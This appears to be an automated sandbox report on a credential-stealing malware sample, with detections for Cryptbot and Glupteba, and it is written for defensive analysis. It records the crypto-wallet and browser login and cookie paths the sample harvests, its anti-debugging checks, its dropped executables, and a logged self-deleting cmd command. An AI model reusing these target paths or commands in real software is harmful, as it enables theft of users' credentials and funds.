Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_00414650 ExpandEnvironmentStringsW,FindFirstFileW,FindFirstFileW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,	0_2_00414650
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_0041469B FindFirstFileW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,CopyFileW,ExpandEnvironmentStringsW,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,	0_2_0041469B
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_00416AC0 FindFirstFileW,FindFirstFileW,	0_2_00416AC0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_00416C3A CopyFileW,ExpandEnvironmentStringsW,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,	0_2_00416C3A
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_0040F259 FindFirstFileW,FindNextFileW,FindClose,	0_2_0040F259
Source: C:\Users\user\AppData\Local\Temp\Murano.exe	Code function: 13_2_00406301 FindFirstFileW,FindClose,	13_2_00406301
Source: C:\Users\user\AppData\Local\Temp\Murano.exe	Code function: 13_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	13_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_0040F64C FindFirstFileExW,	16_2_0040F64C
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_03F5F89C FindFirstFileExW,	16_2_03F5F89C
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Code function: 18_2_00403117 FindFirstFileW,FindClose,SetLastError,CompareFileTime,	18_2_00403117
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Code function: 18_2_00408FA7 ??2@YAPAXI@Z,FindFirstFileW,FindClose,	18_2_00408FA7
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Code function: 18_2_00402A0B FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetCurrentDirectoryW,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,	18_2_00402A0B
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Code function: 18_2_00402B28 FindFirstFileW,FindClose,SetFileAttributesW,DeleteFileW,	18_2_00402B28
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_0040F64C FindFirstFileExW,	22_2_0040F64C
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_05A0F89C FindFirstFileExW,	22_2_05A0F89C
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_0040F64C FindFirstFileExW,	25_2_0040F64C
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_059DF89C FindFirstFileExW,	25_2_059DF89C

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe

Code function: 0_2_0041A280 ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,Sleep,ExpandEnvironmentStringsW,Sleep,GetFileAttributesW,GetFileAttributesW,Sleep,ExpandEnvironmentStringsW,GetFileAttributesW,Sleep,GetSystemInfo,KiUserCallbackDispatcher,GlobalMemoryStatusEx,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,Sleep,ExitProcess,

0_2_0041A280

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Thread delayed: delay time: 102511			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	File opened: C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\files_	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	File opened: C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.383766722.0000000005C63000.00000004.00000001.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe

Code function: 16_2_0040A1A9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

16_2_0040A1A9

Source: C:\Users\user\AppData\Local\Temp\Murano.exe

Code function: 13_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

13_2_00406328

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_004AF241 mov eax, dword ptr fs:[00000030h]	0_2_004AF241
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_0040E0E2 mov eax, dword ptr fs:[00000030h]	16_2_0040E0E2
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_004106D5 mov eax, dword ptr fs:[00000030h]	16_2_004106D5
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_03F5092B mov eax, dword ptr fs:[00000030h]	16_2_03F5092B
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_03F5E332 mov eax, dword ptr fs:[00000030h]	16_2_03F5E332
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_03F60925 mov eax, dword ptr fs:[00000030h]	16_2_03F60925
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_03F50D90 mov eax, dword ptr fs:[00000030h]	16_2_03F50D90
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_0040E0E2 mov eax, dword ptr fs:[00000030h]	22_2_0040E0E2
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_004106D5 mov eax, dword ptr fs:[00000030h]	22_2_004106D5
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_05A00D90 mov eax, dword ptr fs:[00000030h]	22_2_05A00D90
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_05A10925 mov eax, dword ptr fs:[00000030h]	22_2_05A10925
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_05A0092B mov eax, dword ptr fs:[00000030h]	22_2_05A0092B
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_05A0E332 mov eax, dword ptr fs:[00000030h]	22_2_05A0E332
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_0040E0E2 mov eax, dword ptr fs:[00000030h]	25_2_0040E0E2
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_004106D5 mov eax, dword ptr fs:[00000030h]	25_2_004106D5
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_059D092B mov eax, dword ptr fs:[00000030h]	25_2_059D092B
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_059D0D90 mov eax, dword ptr fs:[00000030h]	25_2_059D0D90
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_059E0925 mov eax, dword ptr fs:[00000030h]	25_2_059E0925
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_059DE332 mov eax, dword ptr fs:[00000030h]	25_2_059DE332

Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe

Code function: 16_2_0041178C GetProcessHeap,

16_2_0041178C

Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_0040A1A9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_0040A1A9
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_0040A33C SetUnhandledExceptionFilter,	16_2_0040A33C
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_0040D33E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_0040D33E
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_0040A638 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	16_2_0040A638
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_03F5A3F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_03F5A3F9
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_03F5A888 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	16_2_03F5A888
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_03F5A58C SetUnhandledExceptionFilter,	16_2_03F5A58C
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_03F5D58E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_03F5D58E
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_0040A1A9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	22_2_0040A1A9
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_0040A33C SetUnhandledExceptionFilter,	22_2_0040A33C
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_0040D33E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	22_2_0040D33E
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_0040A638 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	22_2_0040A638
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_05A0A58C SetUnhandledExceptionFilter,	22_2_05A0A58C
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_05A0D58E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	22_2_05A0D58E
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_05A0A888 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	22_2_05A0A888
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_05A0A3F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	22_2_05A0A3F9
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_0040A1A9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	25_2_0040A1A9
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_0040A33C SetUnhandledExceptionFilter,	25_2_0040A33C
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_0040D33E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	25_2_0040D33E
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_0040A638 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	25_2_0040A638
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_059DA58C SetUnhandledExceptionFilter,	25_2_059DA58C
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_059DD58E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	25_2_059DD58E
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_059DA888 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	25_2_059DA888
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_059DA3F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	25_2_059DA3F9

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Process created: C:\Users\user\AppData\Local\Temp\Murano.exe 'C:\Users\user\AppData\Local\Temp\Murano.exe'	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c rd /s /q C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk & timeout 3 & del /f /q 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c C:\Windows\System32\cmd.exe < Scoprirvi.eps	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe

Code function: 18_2_0040285A AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

18_2_0040285A

Source: vpn.exe, 00000012.00000003.387443345.0000000003C68000.00000004.00000001.sdmp, Notti.eps.18.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: SmartClock.exe, 00000016.00000002.497106175.00000000045D0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: SmartClock.exe, 00000016.00000002.497106175.00000000045D0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: SmartClock.exe, 00000016.00000002.497106175.00000000045D0000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: SmartClock.exe, 00000016.00000002.497106175.00000000045D0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: SmartClock.exe, 00000016.00000002.497106175.00000000045D0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe

Code function: 16_2_0040A45B cpuid

16_2_0040A45B

Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe

Code function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,

18_2_004025A3

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\_Files\_AllCookies_list.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\_Files\_Cookies\google_chrome_new.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\_Files\_Information.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\_Files\_Screen_Desktop.jpeg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\files_\cookies\google_chrome_new.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\files_\cookies.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\files_\screenshot.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\files_\system_info.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe

Code function: 0_2_004A0BF0 SetFilePointer,SetFilePointer,SetFilePointer,GetLocalTime,SystemTimeToFileTime,FileTimeToSystemTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,

0_2_004A0BF0

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe

Code function: 0_2_00418C20 CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetModuleFileNameW,RegOpenKeyExW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,ExpandEnvironmentStringsW,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,_strftime,_strftime,GetUserNameW,GetComputerNameW,RegOpenKeyExW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,RegOpenKeyExW,

0_2_00418C20

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe

Code function: 0_2_004B465F _free,_free,_free,GetTimeZoneInformation,_free,

0_2_004B465F

Source: C:\Users\user\AppData\Local\Temp\Murano.exe

Code function: 13_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

13_2_00406831

Stealing of Sensitive Information:

Yara detected Cryptbot

Show sources

Source: Yara match

File source: Process Memory Space: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe PID: 5964, type: MEMORY

Yara detected Glupteba

Show sources

Source: Yara match

File source: Process Memory Space: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe PID: 5964, type: MEMORY

Found many strings related to Crypto-Wallets (likely being stolen)

Show sources

Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	String found in binary or memory: \_Files\_Wallet\Electrum
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	String found in binary or memory: \_Files\_Wallet\ElectronCash
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp	String found in binary or memory: .%USERPROFILE%\Desktop\.txt%USERPROFILE%wallet.datUTC--2%LocalAppData%\Coinomi%AppData%\waves-exchange%AppData%\Ledger Live\sqlite\_Files\_Files\Coinomi\_Files\_Files\waves_exchange\_Files\_Files\Ledger_Live_sqlite\_Files\_Wallet\Electrum\_Files\_Wallet\ElectronCash\_Files\_Wallet\Electrum-btcp%USERPROFILE%\AppData\Roaming\Jaxx%USERPROFILE%\AppData\Roaming\Exodus%USERPROFILE%\AppData\Roaming\MultiBitHD%USERPROFILE%\Documents\Monero%USERPROFILE%\AppData\Roaming\Exodus Eden%USERPROFILE%\AppData\Roaming\Electrum\wallets%USERPROFILE%\AppData\Roaming\Electrum-btcp\wallets%USERPROFILE%\AppData\Roaming\ElectronCash\wallets%USERPROFILE%\AppData\Roaming\com.liberty.jaxx%APPDATA%\Atomic%APPDATA%\waves-client\_Files\_Wallet\Jaxx\_Files\_Wallet\Exodus\_Files\_Wallet\MultiBitHD\_Files\_Wallet\Monero\_Files\_Wallet\Exodus Eden\_Files\_Wallet\Electrum\wallets\_Files\_Wallet\Electrum-btcp\wallets\_Files\_Wallet\ElectronCash\wallets\_Files\_Wallet\com.liberty.jaxx\_Files\_Wallet\Atomic\_Files\_Wallet\waves-client\_Files\_Information.txt\files_\system_info.txt%wS [ %wS ]
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	String found in binary or memory: %USERPROFILE%\AppData\Roaming\Jaxx
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp	String found in binary or memory: .%USERPROFILE%\Desktop\.txt%USERPROFILE%wallet.datUTC--2%LocalAppData%\Coinomi%AppData%\waves-exchange%AppData%\Ledger Live\sqlite\_Files\_Files\Coinomi\_Files\_Files\waves_exchange\_Files\_Files\Ledger_Live_sqlite\_Files\_Wallet\Electrum\_Files\_Wallet\ElectronCash\_Files\_Wallet\Electrum-btcp%USERPROFILE%\AppData\Roaming\Jaxx%USERPROFILE%\AppData\Roaming\Exodus%USERPROFILE%\AppData\Roaming\MultiBitHD%USERPROFILE%\Documents\Monero%USERPROFILE%\AppData\Roaming\Exodus Eden%USERPROFILE%\AppData\Roaming\Electrum\wallets%USERPROFILE%\AppData\Roaming\Electrum-btcp\wallets%USERPROFILE%\AppData\Roaming\ElectronCash\wallets%USERPROFILE%\AppData\Roaming\com.liberty.jaxx%APPDATA%\Atomic%APPDATA%\waves-client\_Files\_Wallet\Jaxx\_Files\_Wallet\Exodus\_Files\_Wallet\MultiBitHD\_Files\_Wallet\Monero\_Files\_Wallet\Exodus Eden\_Files\_Wallet\Electrum\wallets\_Files\_Wallet\Electrum-btcp\wallets\_Files\_Wallet\ElectronCash\wallets\_Files\_Wallet\com.liberty.jaxx\_Files\_Wallet\Atomic\_Files\_Wallet\waves-client\_Files\_Information.txt\files_\system_info.txt%wS [ %wS ]
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	String found in binary or memory: %USERPROFILE%\AppData\Roaming\Exodus

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior

Source: Yara match	File source: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.383574469.0000000005B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.231267121.0000000005BE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe PID: 5964, type: MEMORY
Source: Yara match	File source: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.5b00e50.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.5b00e50.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.5be0000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected Cryptbot

Show sources

Source: Yara match

File source: Process Memory Space: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe PID: 5964, type: MEMORY

Yara detected Glupteba

Show sources

Source: Yara match

File source: Process Memory Space: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe PID: 5964, type: MEMORY

Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_004098C0 AddClipboardFormatListener,SetEvent,	16_2_004098C0
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_00409436 IsWindow,RemoveClipboardFormatListener,IsWindow,	16_2_00409436
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_004095A8 RemoveClipboardFormatListener,	16_2_004095A8
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_004097BA AddClipboardFormatListener,	16_2_004097BA
